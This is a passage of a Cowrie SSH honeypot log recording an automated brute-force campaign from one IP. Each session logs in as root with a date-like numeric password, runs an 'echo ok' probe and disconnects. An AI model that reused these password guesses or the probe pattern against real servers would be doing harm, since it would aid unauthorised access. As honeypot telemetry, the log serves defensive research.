tr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.783180Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.login.success","username":"root","password":"160584","message":"login attempt [root/160584] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.869356Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:45.988523Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:45.989267Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.012919Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.013807Z","src_ip":"212.227.125.160","session":"a31fa47eb2d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44902,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94fb665363e","protocol":"ssh","message":"New connection: 212.227.125.160:44902 (1.2.3.4:22) [session: d94fb665363e]","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.034550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.036313Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.069564Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.login.success","username":"root","password":"160388","message":"login attempt [root/160388] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.179348Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:46.252184Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.253111Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.278870Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.279950Z","src_ip":"212.227.125.160","session":"d94fb665363e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44906,"dst_ip":"1.2.3.4","dst_port":22,"session":"00bdcb549ecd","protocol":"ssh","message":"New connection: 212.227.125.160:44906 (1.2.3.4:22) [session: 00bdcb549ecd]","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.300443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.301973Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.323325Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.login.success","username":"root","password":"151188","message":"login attempt [root/151188] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.434975Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:46.569322Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.570276Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.595317Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:46.596246Z","src_ip":"212.227.125.160","session":"00bdcb549ecd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44918,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c0ca85f9dd6","protocol":"ssh","message":"New connection: 212.227.125.160:44918 (1.2.3.4:22) [session: 1c0ca85f9dd6]","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.698345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.699242Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.721667Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.login.success","username":"root","password":"15101987","message":"login attempt [root/15101987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.809643Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:48.925704Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.926478Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.954572Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.955945Z","src_ip":"212.227.125.160","session":"1c0ca85f9dd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40024,"dst_ip":"1.2.3.4","dst_port":22,"session":"19d572b95ab8","protocol":"ssh","message":"New connection: 212.227.125.160:40024 (1.2.3.4:22) [session: 19d572b95ab8]","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.976234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.977276Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:48.999688Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.login.success","username":"root","password":"150890","message":"login attempt [root/150890] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:49.074606Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:49.137844Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:49.138631Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:49.166604Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:49.167878Z","src_ip":"212.227.125.160","session":"19d572b95ab8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40040,"dst_ip":"1.2.3.4","dst_port":22,"session":"54c28a9c9b64","protocol":"ssh","message":"New connection: 212.227.125.160:40040 (1.2.3.4:22) [session: 54c28a9c9b64]","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.412061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.412731Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.439172Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.login.success","username":"root","password":"150888","message":"login attempt [root/150888] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.520838Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:00.655253Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.655975Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.679597Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.680974Z","src_ip":"212.227.125.160","session":"54c28a9c9b64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58766,"dst_ip":"1.2.3.4","dst_port":22,"session":"40f77ab3d269","protocol":"ssh","message":"New connection: 212.227.125.160:58766 (1.2.3.4:22) [session: 40f77ab3d269]","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.701422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.702463Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.729009Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.login.success","username":"root","password":"150787","message":"login attempt [root/150787] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.805891Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:00.897128Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.898180Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.922927Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:00.924304Z","src_ip":"212.227.125.160","session":"40f77ab3d269"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58772,"dst_ip":"1.2.3.4","dst_port":22,"session":"685a54071402","protocol":"ssh","message":"New connection: 212.227.125.160:58772 (1.2.3.4:22) [session: 685a54071402]","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.123717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.124705Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.200194Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.login.success","username":"root","password":"150190","message":"login attempt [root/150190] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.294157Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:12.360359Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.361186Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.396521Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.397743Z","src_ip":"212.227.125.160","session":"685a54071402"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52204,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e761eeedc07","protocol":"ssh","message":"New connection: 212.227.125.160:52204 (1.2.3.4:22) [session: 3e761eeedc07]","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.424609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:12.425518Z","src_ip":"212.227.125.160","session":"3e761eeedc07"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc",